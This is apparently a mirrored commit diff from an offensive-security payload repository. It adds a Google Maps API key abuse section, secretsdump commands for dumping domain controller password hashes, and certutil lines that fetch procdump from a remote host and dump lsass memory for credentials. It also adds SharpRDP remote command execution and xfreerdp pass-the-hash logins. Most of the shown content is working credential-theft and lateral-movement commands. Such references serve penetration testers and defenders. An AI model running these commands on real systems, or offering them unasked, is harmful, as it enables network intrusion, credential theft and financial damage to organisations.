mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Maps API + secretsdump enabled user/pw last set + certutil mimikatz
This commit is contained in:
parent
9c4578f083
commit
aba6874517
@ -6,6 +6,7 @@
|
||||
|
||||
- [Tools](#tools)
|
||||
- [Exploit](#exploit)
|
||||
- [Google Maps](#google-maps)
|
||||
- [Algolia](#algolia)
|
||||
- [AWS Access Key ID & Secret](#aws-access-key-id--secret)
|
||||
- [Slack API Token](#slack-api-token)
|
||||
@ -27,6 +28,14 @@
|
||||
|
||||
The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
|
||||
|
||||
### Google Maps
|
||||
|
||||
Use : https://github.com/ozguralp/gmapsapiscanner/
|
||||
|
||||
Impact:
|
||||
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
|
||||
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
|
||||
|
||||
### Algolia
|
||||
|
||||
```powershell
|
||||
|
@ -489,10 +489,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||
secretsdump also works remotely
|
||||
|
||||
```java
|
||||
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
|
||||
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status
|
||||
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
|
||||
```
|
||||
|
||||
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
|
||||
* `-user-status`: Display whether or not the user is disabled.
|
||||
|
||||
#### Alternatives - modules
|
||||
|
||||
Metasploit modules
|
||||
|
@ -63,8 +63,11 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||
Dump the lsass process.
|
||||
|
||||
```powershell
|
||||
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
# HTTP method
|
||||
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
|
||||
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
|
||||
# SMB method
|
||||
net use Z: https://live.sysinternals.com
|
||||
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
```
|
||||
|
@ -131,8 +131,15 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get
|
||||
|
||||
## RDP Remote Desktop Protocol
|
||||
|
||||
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
|
||||
```powershell
|
||||
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
Or connect remotely with `rdesktop`
|
||||
|
||||
```powershell
|
||||
python rdpcheck.py DOMAIN/username:password@10.10.10.10
|
||||
rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
@ -165,7 +172,7 @@ or with Metasploit
|
||||
run getgui -u admin -p 1234
|
||||
```
|
||||
|
||||
Then log in using xfreerdp
|
||||
or with xfreerdp
|
||||
|
||||
```powershell
|
||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
@ -173,7 +180,6 @@ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the
|
||||
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||
```
|
||||
|
||||
|
||||
## Netuse
|
||||
|
||||
Windows only
|
||||
|
Loading…
Reference in New Issue
Block a user